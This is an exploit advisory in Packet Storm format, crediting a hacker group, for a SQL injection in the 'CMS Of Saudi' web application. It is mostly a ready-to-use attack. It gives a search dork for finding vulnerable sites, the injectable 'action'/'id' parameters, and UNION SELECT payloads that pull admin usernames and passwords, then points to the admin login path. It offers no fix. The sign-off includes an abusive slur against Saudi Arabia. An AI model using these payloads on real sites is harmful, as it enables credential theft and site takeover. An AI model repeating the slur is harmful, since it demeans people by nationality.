CMS Of Saudi SQL Injection

2011-04-16T00:00:00
ID PACKETSTORM:100511
Type packetstorm
Reporter Net.Edit0r
Modified 2011-04-16T00:00:00

Description

                                        
                                            `#(+) Exploit Title: Cms OF Saudi SQLInjection Vulnerability  
#(+) Author : Net.Edit0r  
#(+) DisCovered By: 3H34N  
#(+) E-mail : Black.Hat.tm@gmail.com & Ehsan.Empire@Att.Net  
#(+) dork : "ÊÕãíã æÈÑãÌÉ ÇáãÓÊÎÏã ÇáÑÞãí"  
#(+) Versian : All Ver  
#(+) Category : Web Apps [SQl]  
#(+) Platform : Tested on: linux-Windows  
#(+) Download : http://www.digi-user.com/  
  
____________________________________________________________________  
Black Hat Group #BHG  
____________________________________________________________________  
  
  
The security problem in the file "index.php" has been created.  
  
[~] Vulnerable File :  
  
# [+]http://localhost.com/index.php?action=[SQL]  
  
[~] SQL injection Vulnerability  
  
# [+]-1+union+select+1,username,password,4,5,6,id+from+admin--  
  
# [+]http://localhost.com/index.php?action=1&id=-3+union+select+1,username,password,4,5,6,id+from+admin--  
  
Note:login page is here http://localhost.com/mng/  
____________________________________________________________________  
____________________________________________________________________  
  
########################################################################  
(+)IRANIAN Young HackerZ # Persian Gulf 4 Ever  
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &  
3H34N & Cmaxx & D3adly #BHG  
(+)Sp My Best Friend : HUrr!c4nE ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~  
Ashkan ..SkilleR.. ~ M4hd1 ~ 4min ~ d3v1l.eyes ~ S3Ri0uS and all  
Friends  
(+)Gr33ts to : All Iranian HackerZ ( Fuck All Saudi Arabia )  
########################################################################  
`